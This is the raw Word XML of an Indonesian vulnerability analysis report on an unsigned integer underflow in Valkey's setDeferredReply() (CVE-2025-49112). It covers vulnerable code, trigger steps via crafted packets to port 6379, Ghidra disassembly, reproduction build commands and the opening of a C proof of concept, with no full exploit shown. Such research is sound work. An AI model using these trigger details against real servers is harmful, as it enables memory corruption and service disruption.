        <w:spacing w:before="300" w:after="160"/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3.2  Kode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Rentan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dan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Penjelasan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Teknis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6A80A18F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1A3A5C" w:sz="4"/>
              <w:right w:val="single" w:color="1A3A5C" w:sz="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4EEA54D5" w14:paraId="70FFF86C" wp14:textId="2C87F3B8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networking Valkey</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BA9C6D6" wp14:textId="7900C4AB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>daea05b1e26db29bfd1c033e27f9d519a2f8ccbb</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12F40E89" wp14:textId="77777777">
            <w:pPr>
              <w:spacing w:after="0" w:line="280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3AE42E65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if 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-&gt;size -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-&gt;used &gt; 0) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C1C84C7" wp14:textId="5ED2703A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Jika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-&gt;used &gt;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-&gt;size,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maka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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58A525A7" wp14:textId="4E35AA72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-&gt;size -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-&gt;used = LARGE_POSITIVE_VALUE (underflow!)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DEB4172" wp14:textId="36EF38EE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Kondisi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&gt; 0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selalu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TRUE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nilai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wrap-around</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D67EDE7" wp14:textId="3FA1BB70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Kode di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dalam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blok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ini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dieksekusi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ukuran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yang salah </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2239F6FF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}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="6E678AD4" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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val="clear" w:color="auto" w:fill="F0F4FA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1C2D1604" wp14:textId="77777777"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Listing 3.1 - Kode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rentan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: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pengurangan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unsigned integer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tanpa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guard (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networking.c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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6D98A12B" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="20FDB7E9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Masalah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utama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pada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kode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di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atas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terletak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pada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asumsi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implisit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bahwa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prev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-&gt;used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tidak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pernah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melebihi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prev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-&gt;size.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Dalam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normal,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asumsi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mungkin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valid.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Namun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ketika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penyerang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memanipulasi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ukuran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paket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dikirim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server,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asumsi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dilanggar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mengakibatkan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kondisi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underflow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tidak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terdeteksi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oleh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pengecekan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kondisi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.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="6798CAAA" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D0DCF0" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="160"/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3.3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Analisis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Skenario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Trigger</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="21EF5C61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Secara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teknis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kondisi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kerentanan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dipicu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melalui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langkah-langkah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berikut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:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2946DB82" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="486C11C3" wp14:textId="7777777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Penyerang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mengirimkan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paket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telah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dimanipulasi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ke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port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Valkey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(default: 6379)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dengan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size header yang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kecil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namun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used yang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melebihinya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.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2F1EAAD8" wp14:textId="7777777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Fungsi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setDeferredReply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()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membaca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prev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-&gt;size dan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prev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-&gt;used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dari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buffer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paket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dikendalikan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penyerang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.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4F97CE47" wp14:textId="7777777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pengurangan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prev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-&gt;size -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prev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-&gt;used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menghasilkan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wrap-around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mendekati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4,294,967,246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uint32_t.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2CDCFA53" wp14:textId="7777777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Kondisi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if (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prev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-&gt;size -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prev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-&gt;used &gt; 0)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mengevaluasi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menjadi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TRUE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karena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wrap-around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adalah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positif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.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="00C657B3" wp14:textId="7777777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Kode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dalam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blok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kondisi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dieksekusi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menggunakan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ukuran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yang salah,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memungkinkan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akses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memori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di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luar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batas yang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dialokasikan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.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5997CC1D" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="110FFD37" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A3A5C" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="12A7B3BA" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="440" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">BAB IV: ANALISIS BINER MENGGUNAKAN GHIDRA</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="7F86648B" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D0DCF0" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="160"/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4.1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Metodologi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Reverse Engineering</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0226C672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memperdalam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pemahaman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tentang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perilaku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kerentanan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pada level biner,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penelitian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menggunakan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Ghidra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(NSA Security Research Tool)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versi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11.x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melakukan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disassembly dan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decompilasi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biner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Valkey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dikompilasi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pada commit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terdampak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.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Analisis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biner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memungkinkan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peneliti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memverifikasi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bahwa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perilaku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underflow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diidentifikasi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pada level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kode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sumber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juga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tercermin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pada level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instruksi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mesin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.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="58D6EFDD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4.2  Langkah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Analisis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Ghidra</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6B699379" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="074B0415" wp14:textId="3B8B81A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Kompilasi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Valkey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dari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commit yang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terdampak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(daea05b1)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dengan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debug symbols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kemudahan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analisis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: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gcc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-g -O0 -o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valkey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-server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src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.c</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5250A6E9" wp14:textId="7777777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Import binary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ke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Ghidra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melalui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File &gt; Import File &gt;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valkey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-server,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pilih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format ELF dan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arsitektur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x86-64.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6B3EF959" wp14:textId="7777777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Jalankan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Auto Analysis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dengan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semua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analyzer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aktif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termasuk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Aggressive Instruction Finder dan Function Start Search.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3DDFC416" wp14:textId="7777777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Navigasi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ke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fungsi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setDeferredReply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()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melalui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Symbol Tree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atau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search function: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Ctrl+Shift+E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&gt;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ketik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setDeferredReply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.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="319E9356" wp14:textId="7777777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Identifikasi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instruksi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SUB (subtract)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dalam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decompiled output di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Decompiler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window.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="53378F31" wp14:textId="7777777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Annotasi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instruksi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relevan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dokumentasi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dan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verifikasi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perilaku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unsigned comparison.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3FE9F23F" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="7D2F5F6F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4.3  Output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Decompilasi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Ghidra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6B91B63A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1A3A5C" w:sz="4"/>
              <w:right w:val="single" w:color="1A3A5C" w:sz="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96B48C" wp14:textId="5207B41A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Output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Decompilasi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Ghidra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-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setDeferredReply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() </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C165EDB" wp14:textId="7B16C514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Versi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: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Ghidra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11.x, Target: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x86-64 ELF</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="608DEACE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4F7404A4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void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setDeferredReply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(client *c, void *node, const char *s,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size_t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length) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E0FB685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listNode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*ln;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32B51577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clientReplyBlock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*old;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0258AC7A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clientReplyBlock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*cur;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BAC6FC9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5B27EF37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ln = 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listNode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*)node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;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="359B6BAB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old = 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clientReplyBlock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*)ln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-&gt;value;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="156A6281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4AB3F67C" wp14:textId="6B0F3062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Instruksi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Assembly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relevan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: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62E7AF2E" wp14:textId="5A7DBE96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MOV    EAX, [RBX+0x10]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load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-&gt;size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EAX </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DB5B022" wp14:textId="39BBCF95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MOV    ECX, [RBX+0x14]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load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-&gt;used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ECX </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="556C3912" wp14:textId="32135024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SUB    EAX, ECX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EAX = size - used (UNSIGNED!) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E3456C2" wp14:textId="49F0DC24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TEST   EAX, EAX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apakah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hasilnya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&gt; 0? </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68C1FE61" wp14:textId="176E9501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JLE    0x4A1F2 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jump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jika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&lt;= 0 (TIDAK TERCAPAI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jika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underflow!) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20876B09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4CE4CDAC" wp14:textId="7AB8655A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if (old-&gt;size - old-&gt;used &gt; 0)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{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&lt;-- TITIK KERENTANAN </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30584F61" wp14:textId="3C24F8FA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Kode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ini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dieksekusi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nilai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size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tidak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valid </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E444AFF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cur = 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clientReplyBlock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*)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listNodeValue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(ln);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2356027D" wp14:textId="12573B9E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...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operasi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memori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menggunakan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nilai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yang di-wrap-around ... </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6440EC07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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46AE40AA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}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="33A47821" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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val="clear" w:color="auto" w:fill="F0F4FA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24BD9F22" wp14:textId="77777777"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Listing 4.1 -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Decompilasi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Ghidra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menunjukkan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instruksi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SUB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tanpa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guard pada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setDeferredReply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()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1F72F646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08CE6F91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D0DCF0" w:sz="2"/>
              <w:right w:val="single" w:color="D0DCF0" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFD"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="61CDCEA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DC217D9" wp14:editId="7777777">
                  <wp:extent cx="8250000" cy="3479167"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="3428406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0000" cy="347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4EEA54D5" w14:paraId="66D993E3" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D8DDE6" w:sz="1"/>
              <w:left w:val="single" w:color="D0DCF0" w:sz="2"/>
              <w:bottom w:val="single" w:color="1A3A5C" w:sz="4"/>
              <w:right w:val="single" w:color="D0DCF0" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EDF2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0825EE" wp14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pP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Figure 2: Output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Ghidra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Decompilation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- Disassembly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setDeferredReply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()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menunjukkan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instruksi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SUB unsigned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tanpa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validasi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| CVE-2025-49112</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6BB9E253" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="504577A3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4.4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Analisis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Instruksi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Assembly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Kritis</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="70AEC7B3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Pada level assembly x86-64,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bermasalah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terlihat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sangat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jelas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.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Instruksi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SUB pada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arsitektur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x86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tidak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membedakan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antara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signed dan unsigned subtraction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dalam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hal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bit-level.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Perbedaannya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hanya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terletak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pada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interpretasi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flag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hasil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(CF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unsigned, OF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signed). Kode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terdampak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menggunakan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perbandingan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tidak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memperhatikan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Carry Flag (CF),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sehingga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kondisi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underflow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tidak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terdeteksi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.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="23DE523C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35ED4145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1A3A5C" w:sz="4"/>
              <w:right w:val="single" w:color="1A3A5C" w:sz="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4EEA54D5" w14:paraId="2A464FC3" wp14:textId="77777777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;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Instruksi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Assembly x86-64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dihasilkan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kondisi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bermasalah</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BA0FA01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;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Ghidra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Disassembly View -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setDeferredReply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()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10146664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3F3D333B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0x004A1D8A: MOV    EAX,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dword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ptr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[RBX + 0x10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]  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EAX =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-&gt;size (50)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="239C6A74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0x004A1D8D: MOV    ECX,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dword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ptr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[RBX + 0x14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]  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ECX =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-&gt;used (100)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03F9ACF8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0x004A1D90: SUB    EAX, ECX           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EAX = 50 - 100 = 0xFFFFFFCE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E8BCD83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;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              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CF (Carry Flag) = 1 (underflow!)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B77AC3D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;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              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Tapi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kode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tidak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memeriksa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CF</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B989C7A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0x004A1D92: TEST   EAX, EAX           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Zero flag check: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EAX !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= 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D2F7E5B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0x004A1D94: JLE    0x004A1F20         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Jump if &lt;= 0 (SIGNED compare!)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F4DC803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;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              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EAX = 0xFFFFFFCE &gt; 0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sebagai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SIGNED</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E67637C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;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              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Kondisi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JLE TIDAK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diambil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= BUG!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50206F22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0x004A1D9A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: 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...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kode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berbahaya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dieksekusi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...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="2E2C8275" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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val="clear" w:color="auto" w:fill="F0F4FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="240" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidP="4EEA54D5" w14:paraId="10143698" wp14:textId="77777777">
            <w:pPr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Listing 4.2 -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Instruksi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assembly x86-64: SUB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tanpa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pemeriksaan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Carry Flag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mengakibatkan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eksekusi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kode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tidak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aman</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="52E56223" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="07547A01" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A3A5C" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6C3E5B2F" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="440" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">BAB V: REPRODUKSI KERENTANAN DAN PROOF OF CONCEPT</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="11D8C5E5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5.1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Lingkungan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Pengujian</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5043CB0F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4EEA54D5" w14:paraId="0DB2F649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0EDCEB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KOMPONEN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C985C1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SPESIFIKASI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="785DB11C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:rsidP="4EEA54D5" w14:paraId="588B6A42" wp14:textId="77777777">
            <w:pPr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Sistem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Operasi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556B9F50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Ubuntu 22.04 LTS x86-64 (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terisolasi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di VM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="6343992B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53A1A432" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Compiler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416AE307" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">GCC 11.4.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="1D104798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0474ACA1" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Target Commit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7713FF6C" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">daea05b1e26db29bfd1c033e27f9d519a2f8ccbb</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="36CA7E3C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:rsidP="4EEA54D5" w14:paraId="23A59822" wp14:textId="77777777">
            <w:pPr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Port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Valkey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7E11AD0E" wp14:textId="77777777">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">6379 (default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="1A27BE05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:rsidP="4EEA54D5" w14:paraId="0C743FC8" wp14:textId="77777777">
            <w:pPr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Tools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Analisis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4C83F63F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Ghidra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11.x, GDB 12.1,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Valgrind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3.19, Python 3.11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="7866D388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:rsidP="4EEA54D5" w14:paraId="1EC73C84" wp14:textId="77777777">
            <w:pPr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Lingkungan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:rsidP="4EEA54D5" w14:paraId="5B31D584" wp14:textId="77777777">
            <w:pPr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Air-gapped VM,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tidak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terhubung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ke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jaringan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publik</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="07459315" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="0AFFCB03" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D0DCF0" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="160"/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5.2  Langkah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Reproduksi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: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Kompilasi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Target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2F58AA91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1A3A5C" w:sz="4"/>
              <w:right w:val="single" w:color="1A3A5C" w:sz="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4EEA54D5" w14:paraId="073C64D3" wp14:textId="65FC0350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Step 1: Clone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repositori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</w:p>
          <w:p w14:paraId="1A6D69D8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git clone https://github.com/valkey-io/valkey.git</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidP="4EEA54D5" w14:paraId="1C68C544" wp14:textId="77777777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cd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</w:p>
          <w:p w14:paraId="5B68B9CD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:rsidP="4EEA54D5" w14:paraId="325AE780" wp14:textId="51538083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Step 2: Checkout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commit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terdampak</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C43B095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git checkout daea05b1e26db29bfd1c033e27f9d519a2f8ccbb</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B7172F4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:rsidP="4EEA54D5" w14:paraId="45188325" wp14:textId="467F694B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Step 3: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Kompilasi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debug symbols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kemudahan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analisis</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="542DF218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make CFLAGS='-g -O0 -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fsanitize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=unsigned-integer-overflow'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="325CE300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:rsidP="4EEA54D5" w14:paraId="415E4D3E" wp14:textId="2B7B7857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Step 4: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Verifikasi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binary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berhasil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dikompilasi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="641FAF78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ls -la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src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/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-server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="480F0374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file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src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/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-server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4023BA8D" wp14:textId="6523EA3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Output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diharapkan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: ELF 64-bit LSB pie executable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="4A6F6090" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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val="clear" w:color="auto" w:fill="F0F4FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="240" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="240" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidP="4EEA54D5" w14:paraId="4A8BD383" wp14:textId="77777777">
            <w:pPr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Listing 5.1 -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Kompilasi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dari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commit yang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terdampak</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6537F28F" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="6A66BB47" wp14:textId="11FE4007">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D0DCF0" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="160"/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5.3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Demonstrasi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Proof of Concept: Underflow</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0306745F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mengilustrasikan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perilaku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underflow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secara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terisolasi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sebelum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eksploitasi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penuh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berikut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adalah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program C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mereproduksi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kondisi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kerentanan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:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6DFB9E20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7DB3659E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1A3A5C" w:sz="4"/>
              <w:right w:val="single" w:color="1A3A5C" w:sz="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BA8FA6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#include &lt;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stdint.h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&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2197A05B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#include &lt;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stdio.h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&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5908FCFB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#include &lt;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stdlib.h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&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25DD3341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5F105E3C" wp14:textId="4866461A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struktur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clientReplyBlock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dari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</w:p>
          <w:p w14:paraId="528F913D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typedef struct {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43FE640D" wp14:textId="476F1CD1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uint32_t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size;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Ukuran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buffer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dialokasikan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</w:p>
          <w:p w14:paraId="259109F7" wp14:textId="3C5E726C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uint32_t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used;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Jumlah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byte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sudah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digunakan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</w:p>
          <w:p w14:paraId="3D9F299A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char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data[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];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A06B4C3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}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clientReplyBlock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;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23DD831B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60686306" wp14:textId="3CA4D570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Replikasi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kondisi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rentan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dari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setDeferredReply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() </w:t>
            </w:r>
          </w:p>
